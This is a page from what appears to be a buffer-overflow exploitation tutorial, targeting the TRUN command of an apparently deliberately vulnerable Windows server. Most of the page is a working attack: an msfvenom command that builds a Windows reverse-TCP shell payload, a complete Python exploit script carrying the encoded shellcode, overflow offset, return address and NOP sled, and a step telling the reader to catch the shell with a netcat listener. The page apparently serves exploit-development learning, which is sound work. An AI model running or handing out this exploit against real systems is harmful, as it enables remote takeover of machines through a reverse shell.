Generating Shellcode

PRACTICE ! PRACTICE ! PRACTICE !

Inorder to generate a shellcode, we are again going to use a metasploit powered tool called msfvenom

$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.105 LPORT=1111 EXITFUNC=thread -f c -a x86 -b "\0x00" > payload

Let's flush this into our python script and exploit to get R00T :)

#!/usr/bin/python

import sys, socket

overflow = ("\xbf\xe1\xed\x78\xbb\xdd\xc2\xd9\x74\x24\xf4\x5d\x2b\xc9"
"\xb1\x52\x83\xed\xfc\x31\x7d\x0e\x03\x9c\xe3\x9a\x4e\xa2"
"\x14\xd8\xb1\x5a\xe5\xbd\x38\xbf\xd4\xfd\x5f\xb4\x47\xce"
"\x14\x98\x6b\xa5\x79\x08\xff\xcb\x55\x3f\x48\x61\x80\x0e"
"\x49\xda\xf0\x11\xc9\x21\x25\xf1\xf0\xe9\x38\xf0\x35\x17"
"\xb0\xa0\xee\x53\x67\x54\x9a\x2e\xb4\xdf\xd0\xbf\xbc\x3c"
"\xa0\xbe\xed\x93\xba\x98\x2d\x12\x6e\x91\x67\x0c\x73\x9c"
"\x3e\xa7\x47\x6a\xc1\x61\x96\x93\x6e\x4c\x16\x66\x6e\x89"
"\x91\x99\x05\xe3\xe1\x24\x1e\x30\x9b\xf2\xab\xa2\x3b\x70"
"\x0b\x0e\xbd\x55\xca\xc5\xb1\x12\x98\x81\xd5\xa5\x4d\xba"
"\xe2\x2e\x70\x6c\x63\x74\x57\xa8\x2f\x2e\xf6\xe9\x95\x81"
"\x07\xe9\x75\x7d\xa2\x62\x9b\x6a\xdf\x29\xf4\x5f\xd2\xd1"
"\x04\xc8\x65\xa2\x36\x57\xde\x2c\x7b\x10\xf8\xab\x7c\x0b"
"\xbc\x23\x83\xb4\xbd\x6a\x40\xe0\xed\x04\x61\x89\x65\xd4"
"\x8e\x5c\x29\x84\x20\x0f\x8a\x74\x81\xff\x62\x9e\x0e\xdf"
"\x93\xa1\xc4\x48\x39\x58\x8f\xb6\x16\x62\x26\x5f\x65\x62"
"\xb9\x24\xe0\x84\xd3\x4a\xa5\x1f\x4c\xf2\xec\xeb\xed\xfb"
"\x3a\x96\x2e\x77\xc9\x67\xe0\x70\xa4\x7b\x95\x70\xf3\x21"
"\x30\x8e\x29\x4d\xde\x1d\xb6\x8d\xa9\x3d\x61\xda\xfe\xf0"
"\x78\x8e\x12\xaa\xd2\xac\xee\x2a\x1c\x74\x35\x8f\xa3\x75"
"\xb8\xab\x87\x65\x04\x33\x8c\xd1\xd8\x62\x5a\x8f\x9e\xdc"
"\x2c\x79\x49\xb2\xe6\xed\x0c\xf8\x38\x6b\x11\xd5\xce\x93"
"\xa0\x80\x96\xac\x0d\x45\x1f\xd5\x73\xf5\xe0\x0c\x30\x15"
"\x03\x84\x4d\xbe\x9a\x4d\xec\xa3\x1c\xb8\x33\xda\x9e\x48"
"\xcc\x19\xbe\x39\xc9\x66\x78\xd2\xa3\xf7\xed\xd4\x10\xf7"
"\x27")

shellcode = "A" * 2003 + "\xaf\x11\x50\x62" + "\x90" * 32 + overflow

try:
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect(('192.168.0.104',9999))

	s.send(('TRUN /.:/' + shellcode))
	s.close()

except:

	print("Error !")
	sys.exit()

  • 2003 A's will lead us to the EIP and the next 4 bytes in the EIP is the pointer address of the essfunc.dll and then we add some NOP's (No Operations) these are basically just the padding and we are padding some space between the pointer address and our malicious shellcode so that no collisions occurs and then we add our malicious shellcode declared in a variable called overflow

  • Set up a netcat listener and run the python script to get R00T

PreviousFinding RIGHT ModuleNextBasics

Last updated